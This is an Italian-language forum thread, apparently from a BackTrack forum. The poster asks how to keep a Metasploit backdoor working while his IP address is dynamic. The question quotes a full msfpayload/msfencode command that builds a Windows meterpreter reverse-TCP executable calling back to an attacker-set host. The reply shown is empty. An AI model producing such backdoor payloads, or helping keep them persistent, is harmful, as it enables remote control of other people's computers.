Results 1 to 2 of 2

Thread: msfpayload: Campo LHOST Statico?

  1. #1
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    7

    Question msfpayload: Campo LHOST Statico?

    Salve ragazzi avrei una domanda da proporvi:
    Premetto che ho un ip dinamico e ogni tot di minuti cambia facendomi buttare ogni volta il backdoor creato e codificato con il metasploit framework, per cui la mia domanda č: nella selezione del localhost in msfpayload tipo questo "msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | msfencode -b '' -t exe -o meterpreter.exe" sarebbe possibile far diventare statico il mio ip in qualche modo? e se sė, mi potreste suggerire in quale? Ho i miei dubbi sull'uso di un dns siccome nel produrre il meterpreter.exe potrebbe dare errori se il campo lhost non č composto da numeri. Ringrazio tutti per ogni eventuale risposta

  2. #2
    Junior Member Focaccia's Avatar
    Join Date
    Jun 2009
    Posts
    63

    Default Re: msfpayload: Campo LHOST Statico?


Similar Threads

  1. Replies: 4
    Last Post: 03-16-2010, 11:17 AM
  2. Replies: 4
    Last Post: 01-11-2010, 07:56 AM
  3. Problem with metasploit(about SRVHOST & LHOST)
    By the-zAx in forum OLD Newbie Area
    Replies: 2
    Last Post: 07-11-2009, 05:21 AM
  4. msfpayload
    By imported_the_fulton in forum OLD BackTrack 4 Bugs and Fixes
    Replies: 4
    Last Post: 07-02-2009, 05:16 AM
  5. vmware-lhost? Vm ip or Windows ip?
    By viso0 in forum OLD Newbie Area
    Replies: 0
    Last Post: 02-08-2009, 11:03 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •